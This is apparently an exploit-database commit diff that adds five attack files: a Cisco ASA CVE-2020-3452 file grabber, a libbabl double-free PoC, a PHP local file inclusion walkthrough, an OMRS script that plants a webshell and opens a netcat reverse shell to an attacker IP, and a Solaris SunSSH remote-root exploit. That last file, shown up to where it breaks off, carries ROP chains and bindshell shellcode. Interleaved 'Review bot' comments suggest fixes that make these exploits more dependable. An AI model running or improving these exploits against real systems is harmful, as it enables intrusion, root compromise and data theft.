DB: 2020-12-16
5 changes to exploits/shellcodes libbabl 0.1.62 - Broken Double Free Detection (PoC) Solaris SunSSH 11.0 x86 - libpam Remote Root Task Management System 1.0 - 'page' Local File Inclusion Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated) Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)
This commit is contained in:
parent
d7c025fc8d
commit
c487e85d00
6 changed files with 921 additions and 0 deletions
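--- a/exploits/hardware/webapps/49262.py
+++ b/exploits/hardware/webapps/49262.py
@@ -0,0 +1,113 @@
+# Exploit Title: Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)
+# Date: 12 Dec 2020
+# Exploit Author: Freakyclown@cygenta.co.uk
+# Vendor Homepage: cisco.com
+# Software Link: It’s against Hardware, specifically ASA’s and FTD’s
+# Version: ASAs (from version 9.6 to 9.14.1.10) and FTD’s (versions 6.2.3 to 6.6.0.1)
+# Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14
+# CVE : CVE-2020-3452
+# Github : https://github.com/cygenta/CVE-2020-3452
+
+import requests
+
+# Written by freakyclown for @CygentaHQ
+# Cisco ASA Path Traversal
+# CVE-2020-3452
+# Usage: CVE-2020-3452.py {target}"
+# Example: CVE-2020-3452.py 192.168.0.12"
+# Requires - Requests - pip3 install requests
+#
+# This tool takes advantage of the above cve and attempts to
+# download files as listed below, it is suggested that you make
+# a working folder for the outputfiles to avoid confusion if
+# attacking mutliple ASA's
+
+# set your target
+target = input("Enter target IP/Url: ")
+
+
+def grabstuff():
+    for file in files:
+        print("trying: ", file)
+
+        #set request parameters
+        params = (
+            ('type', 'mst'),
+            ('textdomain', '+CSCOE+/'+file),
+            ('default-language', ''),
+            ('lang', '../'),
+        )
+
+        # set the response to the result of the request, inputting in target and params and ignoring ssl cert problems
+        response = requests.get('https://'+target+'/+CSCOT+/translation-table', params=params, verify=False)
+        # write the file to the disk
+        f = open(file,"w")
+        f.write(response.text)
+        f.close()
+
+
+
+# this is a list of files available to download, more will be added in time
+# if anyone has a list of ASA files, I'd be happy to add here
+files = {
+    "sess_update.html",
+    "blank.html",
+    "noportal.html",
+    "portal_ce.html",
+    "portal.html",
+    "logon_custom.css",
+    "svc.html",
+    "logo.gif",
+    "portal_inc.lua",
+    "nostcaccess.html",
+    "session.js",
+    "portal.js",
+    "portal_custom.css",
+    "running.conf",
+    "tlbrportal_forms.js",
+    "logon_forms.js",
+    "win.js",
+    "portal.css",
+    "lced.html",
+    "pluginlib.js",
+    "useralert.html",
+    "ping.html",
+    "app_index.html",
+    "shshimdo_url",
+    "session_password.html",
+    "relayjar.html",
+    "relayocx.html",
+    "color_picker.js",
+    "color_picker.html",
+    "cedhelp.html",
+    "cedmain.html",
+    "cedlogon.html",
+    "cedportal.html",
+    "portal_elements.html",
+    "commonspawn.js",
+    "common.js",
+    "appstart.js",
+    "relaymonjar.html",
+    "relaymonocx.html",
+    "cedsave.html",
+    "tunnel_linux.jnlp",
+    "ask.html",
+    "no_svc.html",
+    "preview.html",
+    "cedf.html",
+    "ced.html",
+    "logon_redirect.html",
+    "logout.html",
+    "tunnel_mac.jnlp",
+    "gp-gip.html",
+    "auth.html",
+    "wrong_url.html",
+    "logon.html"}
+
+
+# obvious thing is obvious, try the things and barf if fail
+try:
+    grabstuff()
+except Exception as err:
+    print("Something went wrong sorry")
+    print(err)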
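Review bot: `grabstuff()` writes every response to disk unconditionally (`f.write(response.text)`), so a 404 or a login page ends up saved under a name like `running.conf`, and `logo.gif` is decoded as text and corrupted on the way through. Gate the write on the status and keep the raw bytes: `if response.status_code == 200:` followed by `with open(file, "wb") as f: f.write(response.content)`. A `timeout=` on `requests.get` would also stop one unresponsive appliance from hanging the whole loop. `verify=False` is expected for an ASA's self-signed certificate, but it also silently accepts any interposed host, so this should only be pointed at an address you are authorized to test.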
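--- a/exploits/linux/local/49259.c
+++ b/exploits/linux/local/49259.c
@@ -0,0 +1,57 @@
+# Exploit Title: libbabl 0.1.62 - Broken Double Free Detection (PoC)
+# Date: December 14, 2020
+# Exploit Author: Carter Yagemann
+# Vendor Homepage: https://www.gegl.org
+# Software Link: https://www.gegl.org/babl/
+# Version: libbabl 0.1.62 and newer
+# Tested on: Debian Buster (Linux 4.19.0-9-amd64)
+# Compile: gcc -Ibabl-0.1 -lbabl-0.1 babl-0.1.62_babl_free.c
+
+/*
+ * Babl has an interesting way of managing buffers allocated and freed using babl_malloc()
+ * and babl_free(). This is the structure of its allocations (taken from babl-memory.c):
+ *
+ * typedef struct
+ * {
+ * char *signature;
+ * size_t size;
+ * int (*destructor)(void *ptr);
+ * } BablAllocInfo;
+ *
+ *
+ * signature is used to track whether a chunk was allocated by babl, and if so, whether
+ * it is currently allocated or freed. This is done by either pointing it to the global
+ * string "babl-memory" or "So long and thanks for all the fish." (babl-memory.c:44).
+ *
+ * Using this signature, babl can detect bad behavior's like double free (babl-memory.c:173):
+ *
+ * void
+ * babl_free (void *ptr,
+ * ...)
+ * {
+ * ...
+ * if (freed == BAI (ptr)->signature)
+ * fprintf (stderr, "\nbabl:double free detected\n");
+ *
+ *
+ * Or so the developers think. As it turns out, because babl internally uses libc's malloc()
+ * and free(), which has its own data that it stores within freed chunks, most systems will
+ * overwrite babl's signature variable upon freeing, breaking the double free detection.
+ * The simple PoC below demonstrates this:
+ */
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+#include <babl/babl-memory.h>
+
+int main(int argc, char **argv) {
+    void *buf = babl_malloc(42);
+    babl_free(buf);
+    // BUG: reports an "unknown" pointer warning when the following is clea=
+rly a double free
+    babl_free(buf);
+
+    return 0;
+}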
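Review bot: The comment above the second `babl_free` call is split by a quoted-printable soft break (`clea=` / `rly a double free`), which leaves `rly a double free` as bare text outside any comment, so the listing as committed will not compile. Rejoin it into one line: `// BUG: reports an "unknown" pointer warning when the following is clearly a double free`. The `# Compile:` header also places `-lbabl-0.1` before the source file; on toolchains that link with `--as-needed` the library can be dropped, so `gcc babl-0.1.62_babl_free.c -Ibabl-0.1 -lbabl-0.1` is the safer ordering. `<string.h>` is included but nothing in `main` uses it.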
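--- a/exploits/php/webapps/49258.txt
+++ b/exploits/php/webapps/49258.txt
@@ -0,0 +1,26 @@
+# Exploit Title: Task Management System 1.0 - 'page' Local File Inclusion
+# Exploit Author: İsmail BOZKURT
+# Date: 2020-12-15
+# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: Windows 10 x86_64
+
+Step 1. Log into application with credentials
+Step 2. Click on Branch
+Step 3. Select New Branch http://127.0.0.1/index.php?page=index
+Step 4. change index to ../../../c:/xampp/apache/bin/php.ini%00
+
+Note: php version < 5.3.3
+
+section class="content">
+<div class="container-fluid">
+<?php
+$page = isset($_GET['page']) ? $_GET['page'] : 'home';
+if(!file_exists($page.".php")){
+include '404.html';
+}else{
+include $page.'.php';
+}
+?>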
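Review bot: Step 4's payload depends on the trailing `%00` truncating the appended `.php`, which PHP 5.3.4 and later reject (`include` refuses paths containing a null byte), so the `Note: php version < 5.3.3` line should say that explicitly and add that on current PHP the flaw still exists but is limited to including any file whose name ends in `.php`, e.g. an uploaded one reached via `../`. The `file_exists()` check in the quoted code is not a mitigation; it only confirms that the traversed path exists before including it. The fix is an allow-list, not filtering: `$allowed = ['home', 'index', ...]; $page = in_array($page, $allowed, true) ? $page : 'home';`. The opening `section class="content">` tag in the snippet is also missing its `<`, presumably a copy artifact.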
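--- a/exploits/php/webapps/49260.py
+++ b/exploits/php/webapps/49260.py
@@ -0,0 +1,128 @@
+# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)
+# Google Dork: N/A
+# Date: 2020-14-12
+# Exploit Author: Andrea Bruschi - www.andreabruschi.net
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Windows 10 / Xampp Server and Wamp Server
+
+#!/usr/bin/python3
+
+import requests
+import sys
+import os
+import iterm2
+import AppKit
+
+url = sys.argv[1]
+mobile = sys.argv[2]
+password = sys.argv[3]
+
+# CONFIGURE HERE
+reverse_ip = '192.168.xx.xx'
+reverse_port = 4444
+
+# CONFIGURE HERE
+# SCRIPT WILL DOWNLOAD NETCAT AND A WEBSHELL
+netcat_path = '/local/path/to/nc.exe'
+shell_path = '/local/path/to/shell.php'
+
+
+def login(url, mobile, password):
+
+    url = "{}/user/login.php".format(url)
+    payload = {'mobno':mobile, 'password':password, 'login':''}
+    req = requests.post(url, data=payload)
+    cookie = req.cookies['PHPSESSID']
+
+    return cookie
+
+
+def upload(url, cookie, file=None):
+
+    f = open(file, 'rb')
+    filename, ext = os.path.splitext(file)
+
+    if "exe" in ext:
+        content_type = 'application/octet-stream'
+    else:
+        content_type = 'application/x-php'
+
+    cookie = {'PHPSESSID':cookie}
+    url = "{}/user/marriage-reg-form.php".format(url)
+
+    files = {'husimage': (filename + ext, f, content_type, {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')}
+    payload = {'dom':'05/01/2020','nofhusband':'test', 'hreligion':'test', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'test','hzipcode':'test','hstate':'test','hadharno':'test','nofwife':'test','wreligion':'test','wsbmarriage':'Bachelor','waddress':'test','wzipcode':'test','wstate':'test','wadharno':'test','witnessnamef':'test','waddressfirst':'test','witnessnames':'test','waddresssec':'test','witnessnamet':'test','waddressthird':'test','submit':''}
+    req = requests.post(url, data=payload, cookies=cookie, files=files)
+    print(f'[+] File {ext} uploaded')
+
+
+def get_remote_file(url, ext):
+
+    url = "{}/user/images".format(url)
+    req = requests.get(url)
+    junk = req.text.split(ext)[0]
+    f = junk[-42:] + ext
+
+    return f
+
+
+def persistence(url, webshell, netcat):
+
+    # webshell
+    payload_w = "copy /y {} shell.php".format(webshell)
+    url_w = "{}/user/images/{}?cmd={}".format(url, webshell, payload_w)
+    req_w = requests.get(url_w)
+
+    # netcat
+    payload_n = "copy /y {} nc.exe".format(netcat)
+    url_n = "{}/user/images/{}?cmd={}".format(url, webshell, payload_n)
+    req_n= requests.get(url_n)
+
+    print('[+] Persistence enabled')
+
+
+def get_reverse(url, ip, port):
+
+    payload = "nc.exe -nv {} {} -e cmd.exe".format(ip, port)
+    url_r = "{}/user/images/shell.php?cmd={}".format(url, payload)
+    print('[+] Reverse shell incoming!')
+    req = requests.get(url_r)
+
+
+# CONFIGURE HERE
+# THE SCRIPT WILL LAUNCH iTerm2 WINDOW RUNNING NC LISTENER
+# YOU CAN ALSO COMMENT THE CALL TO THIS FUNCTION BELOW AND START NC MANUALLY
+def start_listener(port):
+
+    # Launch the app
+    AppKit.NSWorkspace.sharedWorkspace().launchApplication_("iTerm2")
+
+    async def main(connection):
+        app = await iterm2.async_get_app(connection)
+        window = app.current_window
+        if window is not None:
+            cmd = "nc -lnv {}".format(port)
+            await window.async_create_tab(command=cmd)
+        else:
+            print("No current window")
+
+    iterm2.run_until_complete(main)
+
+
+
+if __name__ == "__main__":
+
+    if len(sys.argv < 3):
+        print("Usage: exploit.py <URI> <MOBILE> <PASSWORD>")
+    else:
+        cookie = login(url, mobile, password)
+        upload(url, cookie, netcat_path)
+        upload(url, cookie, shell_path)
+        webshell = get_remote_file(url, '.php')
+        netcat = get_remote_file(url, '.exe')
+        persistence(url, webshell, netcat)
+
+        start_listener(reverse_port)
+        get_reverse(url, reverse_ip, reverse_port)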
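Review bot: The argument check at the bottom, `if len(sys.argv < 3):`, is wrong on two counts: the comparison is applied to the list rather than its length (a `TypeError` in Python 3), and the script consumes three positional arguments, so the threshold should be 4. Because `url = sys.argv[1]`, `mobile` and `password` are read at module level, a short command line raises `IndexError` before this check is ever reached; move those three reads under the guard and write it as `if len(sys.argv) < 4:`. `login()` also indexes `req.cookies['PHPSESSID']` without checking that the credentials were accepted, so a wrong password surfaces as a `KeyError` instead of a clear message. The `iterm2` and `AppKit` imports are macOS-only and would be better imported inside `start_listener()` so the rest of the script still runs elsewhere, as the comment above that function already suggests.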
592
exploits/solaris/remote/49261.c
Normal file
592
exploits/solaris/remote/49261.c
Normal file
|
@ -0,0 +1,592 @@
|
|||
# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root
|
||||
# Exploit Author: Hacker Fantastic
|
||||
# Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris11-overview.html
|
||||
# Version: 11
|
||||
# Tested on: SunOS solaris 5.11 11.0
|
||||
|
||||
/* SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871
|
||||
* ====================================================================
|
||||
* Makefile
|
||||
* all: hfsunsshdx
|
||||
*
|
||||
* hfsunsshdx: main.c
|
||||
* gcc main.c -o hfsunsshdx -lssh2
|
||||
*
|
||||
* clean:
|
||||
* rm -rf hfsunsshdx
|
||||
* rm -rf core.*
|
||||
*
|
||||
* A trivial to reach stack-based buffer overflow is present in libpam on
|
||||
* Solaris. The vulnerable code exists in pam_framework.c parse_user_name()
|
||||
* which allocates a fixed size buffer of 512 bytes on the stack and parses
|
||||
* usernames into the buffer via modules (authtok_get) without bounds checks.
|
||||
* This issue can be reached remotely pre-authentication via SunSSH when
|
||||
* "keyboard-interactive" is enabled to use PAM based authentication. The
|
||||
* vulnerability was discovered being actively exploited by FireEye in the
|
||||
* wild and is part of an APT toolkit called "EVILSUN". The vulnerability
|
||||
* is present in both SPARC/x86 versions of Solaris & others (eg. illumos).
|
||||
* This exploit uses ROP gadgets to disable nxstack through mprotect on x86
|
||||
* and a helper shellcode stub. The configuration in a default Solaris
|
||||
* install is vulnerable. The exploit makes use of libssh2 and tested on
|
||||
* Solaris 10 through 11.0. Solaris 9 does not ship with a vulnerable
|
||||
* SunSSH implementation and versions later than 11.1 have updated SunSSH
|
||||
* code that prevents the issue being triggered.
|
||||
*
|
||||
* e.g.
|
||||
* ./hfsunsshdx -s 192.168.11.220 -t 0 -x 2
|
||||
* [+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871
|
||||
* [-] chosen target 'Solaris 11 11/11 11.0 Sun_SSH_2.0 x86'
|
||||
* [-] using shellcode 'Solaris 11.0 x86 bindshell tcp port 9999' 193 bytes
|
||||
* [+] ssh host fingerprint: 01bc34fe8092e051716b91fd88eed210db2df49e
|
||||
* [+] entering keyboard-interactive authentication.
|
||||
* [-] number of prompts: 1
|
||||
* [-] prompt 0 from server: 'Please enter user name: '
|
||||
* [-] shellcode length 193 bytes
|
||||
* [-] rop chain length 68
|
||||
* [-] exploit buffer length 580
|
||||
* [-] sending exploit magic buffer... wait
|
||||
* [+] exploit success, handling payload...
|
||||
* [-] connected.. enjoy :)
|
||||
* SunOS solaris 5.11 11.0 i86pc i386 i86pc
|
||||
* 6:49pm up 53 min(s), 1 user, load average: 0.01, 0.01, 0.01
|
||||
* helpdesk console Nov 27 17:57
|
||||
* uid=0(root) gid=0(root)
|
||||
*
|
||||
* -- Hacker Fantastic (https://hacker.house)
|
||||
*/
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <fcntl.h>
|
||||
#include <errno.h>
|
||||
#include <ctype.h>
|
||||
#include <getopt.h>
|
||||
#include <time.h>
|
||||
#include <signal.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
#include <sys/select.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <sys/time.h>
|
||||
#include <libssh2.h>
|
||||
|
||||
int sd = -1;
|
||||
int oldsd = -1;
|
||||
int ishell = -1;
|
||||
char* buf;
|
||||
char* payload;
|
||||
char* retaddr;
|
||||
struct sockaddr_in sain;
|
||||
|
||||
struct target {
|
||||
char* name;
|
||||
char* ropchain;
|
||||
};
|
||||
|
||||
struct shellcode {
|
||||
char* name;
|
||||
char* shellcode;
|
||||
};
|
||||
|
||||
void spawn_shell(int);
|
||||
void bindshell_setup(short);
|
||||
void on_alarm(int);
|
||||
void on_interupt(int);
|
||||
void prepare_payload();
|
||||
|
||||
const int targetno = 5;
|
||||
struct target targets[] = {
|
||||
{"Solaris 11 11/11 11.0 Sun_SSH_2.0 x86",
|
||||
"\x41\x42\x43\x44" // %ebx
|
||||
"\x45\x46\x47\x48" // %esi
|
||||
"\x50\x51\x52\x53" // %ebp
|
||||
"\xa7\x0e\x06\x08" // pop %ecx, pop %edx, pop %ebp
|
||||
"\x9c\x3e\x04\x08" // ptr to (0x?, 0x?, 0x8044cf0, 0x7)
|
||||
"\x01\x01\x04\x08" // %edx unused, must be writeable addr
|
||||
"\x41\x42\x43\x44" // %ebp unused var
|
||||
"\x93\xdb\xc8\xfe" // pop %edx ; ret
|
||||
"\x01\x30\x04\x08" // ptr to 0x08043001 mprotect arg
|
||||
"\x1a\xe7\x0b\xfe" // dec %edx ; ret
|
||||
"\x79\x41\xfe\xfe" // mov %edx,$0x4(%ecx) ; xor %eax, %eax ; ret
|
||||
"\x93\xdb\xc8\xfe" // pop %edx ; ret
|
||||
"\x01\x30\x04\x08" // ptr to shellcode
|
||||
"\xe0\xe8\x3e\xfe" // mov $0x72,%al
|
||||
"\x64\x7c\xc3\xfe" // inc %eax ; ret
|
||||
"\x64\x7c\xc3\xfe" // inc %eax ; ret
|
||||
"\x22\x9d\xd3\xfe"},// sysenter
|
||||
{"Solaris 11 Express (snv_151a) Sun_SSH_1.5 x86",
|
||||
"\x41\x42\x43\x44" // %ebx overwrite unused
|
||||
"\x41\x42\x43\x44" // %esi overwrite unused
|
||||
"\xf8\x32\x04\x08" // %ebp overwrite unused
|
||||
"\xb7\xf9\x05\x08" // pop %ecx ; pop %edx ; pop %ebp ; ret
|
||||
"\x7e\x36\x02\x04" // ptr/2 to (0x?, 0x0, 0x1000, 0x7)
|
||||
"\x01\x30\x04\x08" // ptr for %edx
|
||||
"\x44\x43\x42\x41" // ptr for %ebp unused
|
||||
"\xe4\xd4\xde\xfe" // dec %edx ; add %ecx, %ecx ; ret
|
||||
"\x19\x42\xfe\xfe" // mov %edx,$0x4(%ecx) ; xor %eax, %eax; ret
|
||||
"\xb8\xf9\x05\x08" // pop %edx ; pop %ebp ; ret
|
||||
"\xeb\x30\x04\x08" // shellcode ptr for %edx
|
||||
"\x1c\x33\x04\x08" // %ebp & used by "leave"
|
||||
"\x84\x98\x51\xfe" // mov $0x82, %eax ; pop %esi ; pop %ebx ; leave ; ret
|
||||
"\x41\x42\x43\x44" // %esi unused
|
||||
"\xe0\x30\x04\x08" // shellcode ptr to %ebx
|
||||
"\xe8\x32\x04\x08" // ptr into %ebp
|
||||
"\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret
|
||||
"\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret
|
||||
"\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret
|
||||
"\x11\x3f\xfe\xfe" // sub $0x2,%eax ; ret
|
||||
"\xfe\xf8\xcf\xfe"},// sysenter
|
||||
{"Solaris 10 1/13 (147148-26) Sun_SSH_1.1.5 x86",
|
||||
"\xc3\x31\x04\x08" // overwrite %ebp unused
|
||||
"\xa3\x6c\xd8\xfe" // mov $0x74, %eax ; ret
|
||||
"\x29\x28\x07\x08" // pop %ebx ; ret
|
||||
"\xf0\xff\xaf\xfe" // 0x0a writen to address, unused gadget
|
||||
"\x08\xba\x05\x08" // pop %edx ; pop %ebp ; ret
|
||||
"\x01\x30\x04\x08" // %edx pointer to page
|
||||
"\xb8\x31\x04\x08" // unused %ebp value
|
||||
"\xaa\x4c\x68\xfe" // pop %ecx ; ret
|
||||
"\xe0\x6e\x04\x08" // ptr (0x?,0x0,0x1000,0x7)
|
||||
"\x61\x22\x07\x08" // dec %edx ; ret
|
||||
"\x8b\x2d\xfe\xfe" // mov %edx,0x4(%ecx) ; xor %eax,%eax ; ret
|
||||
"\xa3\x6c\xd8\xfe" // mov $0x74, %eax ; ret
|
||||
"\x08\xba\x05\x08" // pop %edx ; pop %ebp ; ret
|
||||
"\xc3\x31\x04\x08" // shellcode addr for %edx
|
||||
"\xc3\x31\x04\x08" // unused %ebp value
|
||||
"\xf6\x0d\xf4\xfe"},// sysenter, (ret into shellcode via %edx)
|
||||
{"Solaris 10 8/11 (147441-01) Sun_SSH_1.1.4 x86",
|
||||
"\xc3\x31\x04\x08" // overwrite %ebp unused
|
||||
"\x73\x6a\xd7\xfe" // mov $0x74, %eax ; ret
|
||||
"\xb1\x26\x07\x08" // pop %ebx ; ret
|
||||
"\xff\x01\xac\xfe" // write garbage here, unused gadget
|
||||
"\x98\xb9\x05\x08" // pop %edx ; pop %ebp ; ret
|
||||
"\xff\x2f\x04\x08" // %edx pointer to page
|
||||
"\xc3\x31\x04\x08" // unused %ebp value
|
||||
"\x57\xaa\xe4\xfe" // pop %ecx ; ret
|
||||
"\x94\x11\x5f\xfe" // ptr rwx (0x?,0x04b,0xe50,0x7)
|
||||
"\xee\x6a\x65\xfe" // inc %edx ; ret
|
||||
"\x9b\xc5\xc1\xfe" // mov %edx,0x4($ecx) ; xor %eax,%eax ; ret
|
||||
"\x73\x6a\xd7\xfe" // mov $0x74, %eax ; ret
|
||||
"\x86\xae\xe5\xfe" // pop %edx ; ret
|
||||
"\xc3\x31\x04\x08" // shellcode return address for %edx
|
||||
"\x66\x56\xb9\xfe"},// sysenter (ret into shellcode via %edx)
|
||||
{"Solaris all Sun_SSH_1.x.x debug crash target",
|
||||
"\x41\x42\x43\x43" // %ebp ptr
|
||||
"\x78\x79\x80\x81"} // %eip ptr
|
||||
};
|
||||
|
||||
const int shellno = 4;
|
||||
|
||||
struct shellcode shellcodes[] = {
|
||||
{"Solaris x86 bindshell tcp port 9999",
|
||||
/* mprotect magic stub necessary for payloads expecting +x stack */
|
||||
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9"
|
||||
"\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50"
|
||||
"\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91"
|
||||
/* mprotect_shellcode.S Solaris x86 mprotect(0x08044000,0x7000,0x07);
|
||||
==================================================================
|
||||
xorl %eax, %eax
|
||||
xorl %ecx, %ecx
|
||||
movl $0x08041001, %ebx
|
||||
movw $0x7001, %ax
|
||||
movb $0x7,%cl
|
||||
dec %ebx
|
||||
dec %eax
|
||||
pushl %ecx
|
||||
pushl %eax
|
||||
pushl %ebx
|
||||
pushl %ebx
|
||||
movl %esp, %ecx
|
||||
xorl %eax, %eax
|
||||
movb $0x74, %al
|
||||
int $0x91
|
||||
*/
|
||||
/* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=9999 -f c -e x86/xor_dynamic */
|
||||
"\xeb\x23\x5b\x89\xdf\xb0\x55\xfc\xae\x75\xfd\x89\xf9\x89\xde"
|
||||
"\x8a\x06\x30\x07\x47\x66\x81\x3f\x2a\x95\x74\x08\x46\x80\x3e"
|
||||
"\x55\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x55\x69"
|
||||
"\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1"
|
||||
"\x51\x69\xfe\x03\x26\x0e\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b"
|
||||
"\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7"
|
||||
"\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51"
|
||||
"\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72"
|
||||
"\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52"
|
||||
"\xb1\x3a\xfe\xd7\x2a\x95"},
|
||||
{"Solaris x86 bindshell tcp port 8080",
|
||||
/* mprotect magic stub necessary for payloads expecting +x stack */
|
||||
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9"
|
||||
"\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50"
|
||||
"\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91"
|
||||
/* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=8080 -f c -e x86/xor_dynamic */
|
||||
"\xeb\x23\x5b\x89\xdf\xb0\x9a\xfc\xae\x75\xfd\x89\xf9\x89\xde"
|
||||
"\x8a\x06\x30\x07\x47\x66\x81\x3f\x44\x60\x74\x08\x46\x80\x3e"
|
||||
"\x9a\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x9a\x69"
|
||||
"\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1"
|
||||
"\x51\x69\xfe\x03\x1e\x91\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b"
|
||||
"\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7"
|
||||
"\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51"
|
||||
"\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72"
|
||||
"\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52"
|
||||
"\xb1\x3a\xfe\xd7\x44\x60"},
|
||||
/* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */
|
||||
{"Solaris 11.0 x86 bindshell tcp port 9999",
|
||||
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||
"\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70"
|
||||
"\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89"
|
||||
"\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different
|
||||
"\xb8\x5d\x6d\x26\x15\xda\xce\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
|
||||
"\x19\x31\x42\x15\x83\xea\xfc\x03\x42\x11\xe2\xa8\x05\xd9\xcd"
|
||||
"\xad\xea\x4f\x8b\xd8\xf5\x67\x05\xde\x0f\x91\x9b\x1e\xbf\xf6"
|
||||
"\x24\x9c\x67\x08\x52\x47\x0d\x14\x34\xd7\xb8\x1a\xde\xd5\x8c"
|
||||
"\xfd\xe1\x0f\x86\x11\x49\xff\x66\xd2\xc5\x17\x77\x04\x7e\xb7"
|
||||
"\xdb\x19\x68\xc8\x0a\xe9\x81\xc9\x65\x60\x5f\x5f\x83\x25\x35"
|
||||
"\xa1\xcb\x3a\x1f\x22\xa4\x1c\xd9\x2a\x0a\x5d\x4a\xba\x42\x72"
|
||||
"\x18\x52\xf5\xa3\xbc\xcb\x6b\x35\xa3\x5b\x27\xcc\xc5\x0b\x97"
|
||||
"\x9f\x56\x1b\x2c\xdf\x8f"},
|
||||
/* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */
|
||||
{"Solaris 11.0 x86 bindshell tcp port 4444",
|
||||
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||
"\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70"
|
||||
"\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89"
|
||||
"\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different
|
||||
"\xb8\x8d\x2e\x32\x79\xd9\xe5\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
|
||||
"\x19\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\x78\x46\xcd\xa1"
|
||||
"\x7d\xab\x5b\x37\x08\x32\x6c\xe1\x0e\x4d\x85\x3f\xce\xe1\xc2"
|
||||
"\xc0\xcc\x1e\x83\xb6\x37\x4a\xa1\x98\xe7\xe1\xa7\x72\x05\x46"
|
||||
"\x41\x7d\xdf\xcc\x9e\xd5\x8f\x21\x5f\x69\xc7\xbd\x89\xd1\x47"
|
||||
"\x11\x86\x0f\x98\x43\x56\x25\x99\xba\xfd\xb3\x0f\x4a\x52\xae"
|
||||
"\xf1\x14\xad\xf8\xf2\xea\x89\x7c\xfa\xc4\xe9\x2f\x6a\x08\xc5"
|
||||
"\xbc\x02\x3e\x36\x21\xbb\xd0\xc1\x46\x6b\x7e\x5b\x69\xdb\xd0"
|
||||
"\x0a\x39\x6b\xeb\x53\x6b"}
|
||||
};
|
||||
|
||||
void spawn_shell(int sd) {
|
||||
#define sockbuflen 2048
|
||||
int rcv;
|
||||
char sockbuf[sockbuflen];
|
||||
fd_set readfds;
|
||||
memset(sockbuf,0,sockbuflen);
|
||||
snprintf(sockbuf,sockbuflen,"uname -a;uptime;who;id\n");
|
||||
